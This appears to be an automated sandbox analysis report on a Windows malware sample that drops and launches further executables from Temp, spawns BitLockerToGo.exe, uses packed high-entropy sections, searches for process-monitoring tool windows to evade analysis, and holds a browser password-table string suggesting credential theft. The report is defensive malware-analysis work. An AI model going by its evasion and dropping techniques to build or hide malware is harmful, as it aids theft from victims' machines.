Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

File created: C:\Users\user\AppData\Local\Temp\bb556cff4a

Jump to behavior

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2ea5560900.exe, 0000000C.00000003.3627194792.0000000003658000.00000004.00000800.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000003.3626685672.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000003.3660884293.000000000367B000.00000004.00000800.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000003.3661376937.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: wJWNpO6lcm.exe	Virustotal: Detection: 59%
Source: wJWNpO6lcm.exe	ReversingLabs: Detection: 65%

Source: wJWNpO6lcm.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: wJWNpO6lcm.exe	String found in binary or memory: " /add /y
Source: wJWNpO6lcm.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y
Source: a99d155ba8.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

File read: C:\Users\user\Desktop\wJWNpO6lcm.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wJWNpO6lcm.exe "C:\Users\user\Desktop\wJWNpO6lcm.exe"
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe "C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe"
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Process created: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe "C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe "C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe"
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe "C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe "C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Process created: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe "C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: wJWNpO6lcm.exe

Static file information: File size 2209792 > 1048576

Source: wJWNpO6lcm.exe

Static PE information: Raw size of lzhxcjlt is bigger than: 0x100000 < 0x1ab800

Source:	Binary string: BitLockerToGo.pdb source: a99d155ba8.exe, 0000000D.00000002.3842910350.000000000DBD8000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: a99d155ba8.exe, 0000000D.00000002.3842910350.000000000DBD8000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Unpacked PE file: 0.2.wJWNpO6lcm.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzhxcjlt:EW;gutsjkwz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzhxcjlt:EW;gutsjkwz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 1.2.rapes.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzhxcjlt:EW;gutsjkwz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzhxcjlt:EW;gutsjkwz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 2.2.rapes.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzhxcjlt:EW;gutsjkwz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzhxcjlt:EW;gutsjkwz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 6.2.rapes.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzhxcjlt:EW;gutsjkwz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzhxcjlt:EW;gutsjkwz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Unpacked PE file: 13.2.a99d155ba8.exe.4f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wmmvgpos:EW;mcuartdt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wmmvgpos:EW;mcuartdt:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: a99d155ba8.exe.6.dr	Static PE information: real checksum: 0x3c6a2b should be: 0x3c9553
Source: wJWNpO6lcm.exe	Static PE information: real checksum: 0x21c205 should be: 0x229f9f
Source: random[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xc60c3
Source: rapes.exe.0.dr	Static PE information: real checksum: 0x21c205 should be: 0x229f9f
Source: 2ea5560900.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xc60c3
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x3c6a2b should be: 0x3c9553

Source: wJWNpO6lcm.exe	Static PE information: section name:
Source: wJWNpO6lcm.exe	Static PE information: section name: .idata
Source: wJWNpO6lcm.exe	Static PE information: section name:
Source: wJWNpO6lcm.exe	Static PE information: section name: lzhxcjlt
Source: wJWNpO6lcm.exe	Static PE information: section name: gutsjkwz
Source: wJWNpO6lcm.exe	Static PE information: section name: .taggant
Source: rapes.exe.0.dr	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name: .idata
Source: rapes.exe.0.dr	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name: lzhxcjlt
Source: rapes.exe.0.dr	Static PE information: section name: gutsjkwz
Source: rapes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: wmmvgpos
Source: random[1].exe0.6.dr	Static PE information: section name: mcuartdt
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: a99d155ba8.exe.6.dr	Static PE information: section name:
Source: a99d155ba8.exe.6.dr	Static PE information: section name: .idata
Source: a99d155ba8.exe.6.dr	Static PE information: section name:
Source: a99d155ba8.exe.6.dr	Static PE information: section name: wmmvgpos
Source: a99d155ba8.exe.6.dr	Static PE information: section name: mcuartdt
Source: a99d155ba8.exe.6.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_00AF9FC1 push ecx; ret	6_2_00AF9FD4
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00B9711A push ecx; ret	11_2_00B9712D
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00C18FF1 push es; iretd	11_2_00C18FF2
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044F34E push ds; iretd	12_2_0044F350
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004513DA push edx; retf	12_2_004513FE
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004554C9 push 00000000h; iretd	12_2_00455520
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00451648 pushad ; retf	12_2_00451689
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00455676 push 00000000h; iretd	12_2_004556EC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00455766 push 00000000h; ret	12_2_00455770
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004517FC push ebx; ret	12_2_00451803
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B9711A push ecx; ret	12_2_00B9712D
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00C18FF1 push es; iretd	12_2_00C18FF2

Source: wJWNpO6lcm.exe	Static PE information: section name: entropy: 6.994429030891126
Source: wJWNpO6lcm.exe	Static PE information: section name: lzhxcjlt entropy: 7.9533394688986085
Source: rapes.exe.0.dr	Static PE information: section name: entropy: 6.994429030891126
Source: rapes.exe.0.dr	Static PE information: section name: lzhxcjlt entropy: 7.9533394688986085
Source: random[1].exe0.6.dr	Static PE information: section name: wmmvgpos entropy: 7.955714570698563
Source: a99d155ba8.exe.6.dr	Static PE information: section name: wmmvgpos entropy: 7.955714570698563

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass	Jump to behavior
